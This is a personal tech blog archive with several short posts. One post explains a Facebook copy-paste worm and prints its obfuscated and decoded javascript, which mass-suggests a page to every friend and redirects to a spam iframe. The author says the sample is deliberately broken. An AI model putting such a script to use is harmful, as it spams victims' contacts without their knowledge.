Archive for the Category "Hacking"

A iPhone & iPod Touch stand using a Head-Crab :3

Guess what, Facebook has another worm – the social “please help me breed” engineering kind.

Got a suggestion from a friend to a page called “Who Removed You” or “Get a free iWhatever” and clicked and found that it directs you to its summary page that asks you to copy-paste some code to your address bar. You did ?

This is as basic as social engineering goes. As you de-obfuscate the code:

javascript:var _0x8293=["\x69\x6E\x6E   ...     etc     ...   x65\x3E"];
var variables=[_0x8293[0],_0x8293[1],_0x8293[2],_0x8293[3]
,_0x8293[4],_0x8293[5],_0x8293[6],_0x8293[7],_0x8293[8],_0x8293[9],_0x8293[10],
_0x8293[11],_0x8293[12],_0x8293[13]];
void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true);
void ss[variables[9]](c);
void setTimeout(function (){fs[variables[10]]();} ,4000);
void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000);
void (document[variables[2]](variables[1])[variables[0]]=_0x8293[14]);

you get something like:

document.getElementById("app1153454353453_body").innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=15345435345\ class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";
var ss=document.getElementById("suggest");
var c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
void ss.dispatchEvent(c);
void setTimeout(function (){fs.select_all();} ,4000);
void setTimeout(function (){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php");} ,5000);
void (document.getElementById("app1153454353453_body").innerHTML="<iframe src=\"http:// whodeletedyou dot blogspot.com/p/click-here-to-find-out-how-to-know-who.html\" style=\"width: 800px; height: 600px;\" frameborder=0 scrolling=\"no\"></iframe>");

Note: I intentionally broke this sample.

The code makes a “suggest to friends” popup, selects them all and sends it – you have no idea what hapened – then it sends you to another spam site – often asking you to fill out a survey.

This is the kind of thing that wont happen to most Facebook users ( as the concept of copy/paste and address bar is way beyond most people – not to mention the hand coordination one has to have to select the code ), so don’t expect this kind of thing from your Mom. (unless she just mass suggests everything by herself anyway ). /rant

As for the guy that worried who removed him so much he just had to copy+paste: Don’t worry, you wont see me go.

In related news, there is no way to report these kind of issues to Facebook.

~copy&paste

In one particural case, you don’t want to disable WP registration but just redirect the page so some other script takes care of it. That happened to me while working on a WordPress and bbPress website. The solution is quite simple:

add_action(‘login_form_register’, ‘redirectregister’);
function redirectregister(){wp_redirect(get_option(‘siteurl’) . ‘/bb/register.php’);}

add this where wordpress will find it, in your functions file or just any plugin.

Just a small update for joomkey, a language file. As I am not using this module actively I don’t have the time or the will to move it forward more.  But some people are using it.

So todays update is a dutch language file, thanks Chris

mod_joomkey.nl-NL

And once again for all the others:

• This module displays a on screen keyboard that attaches itself to all html text fields and input fields.
• To use it, you have to select one of those fields.
• You can place this module in any visible position
• It will use the local language, you may need to make a file with your locale (even if it is the same as standard English)
• As it looks at Joomla’s locale, it will work with JoomFish or similar..
• It wont work inside frames/iframes (use the firefox extension instead)
• You can make it do other stuff with the buttons (as in print whole words as in iphone’s .com button etc)

As most who use this module probably do so with a kiosk in mind, I would recommend the Firefox keyboard extension I built.

New day, new toy.
All the time lodging around my Dell Inspiron got to me today as I went and bought a Medion E1210 SubNoteBook ( NetBook )

(more…)

JoomKey is a joomla native mootools js virtual keyboard. It can be used on html inputs and textareas.

The language is based on the language of the currently viewed site/article. It comes with English, German and Slovenian keyboard but can be easily be fitted with any additional language. If you do create a language please send it to me so i can add it.

Download Module JoomKey 0.1.0

Tested on Firefox 3. Made in scope of the Institut-Oko Kiosk project.

(C) Marko Zabreznik

How hard can it be to install a app for everyone to use, BlueHost ?!

Well, in any case. This is how to do it yourself ( source ):

cd ~
mkdir src
cd ~/src
wget http://www.gtlib.gatech.edu/pub/apache/apr/apr-util-1.2.12.tar.gz
wget http://www.gtlib.gatech.edu/pub/apache/apr/apr-1.2.12.tar.gz
wget http://subversion.tigris.org/downloads/subversion-1.4.6.tar.gz
wget http://www.webdav.org/neon/neon-0.25.5.tar.gz
tar -xzf apr-util-1.2.12.tar.gz
tar -xzf apr-1.2.12.tar.gz
tar -xzf subversion-1.4.6.tar.gz
tar -xzf neon-0.25.5.tar.gz
cd ~/src/apr-1.2.12
./configure --prefix=$HOME LDFLAGS="-L/lib64"
make
make install
cd ~/src/apr-util-1.2.12
./configure --prefix=$HOME --with-apr=$HOME LDFLAGS="-L/lib64"
make
make install
cd ~/src/neon-0.25.5
./configure --enable-shared --prefix=$HOME LDFLAGS="-L/lib64"
make
make install
cd ~/src/subversion-1.4.6
./configure --prefix=$HOME --without-berkeley-db --with-zlib --with-ssl LDFLAGS="-L/lib64"
make
make install


I Bought a Wacom Bamboo Fun Small Graphics Tablet a couple of days ago.
Wanting one for quite some time now, I decided to go and buy it on-line. And after 3 days, it came all the way from Germany .

I didnt even try running it on windows/mac before I plugged it into my ‘box running OpenSuse 11. First thing I notice: Its already working. Kindof.  It’s got relative tracking and the pad/buttons dont work.

How i got it running and some pics, after the jump. (more…)

Working on the same principle as the last mjpg_stream implemenation, here it is: a portace plugin !

(more…)

A advanced Biorhythm calculator i made for a school project some time ago. Works perfectly. But its really how you interpret it ( All a bunch of crap if you ask me XD )

Link here.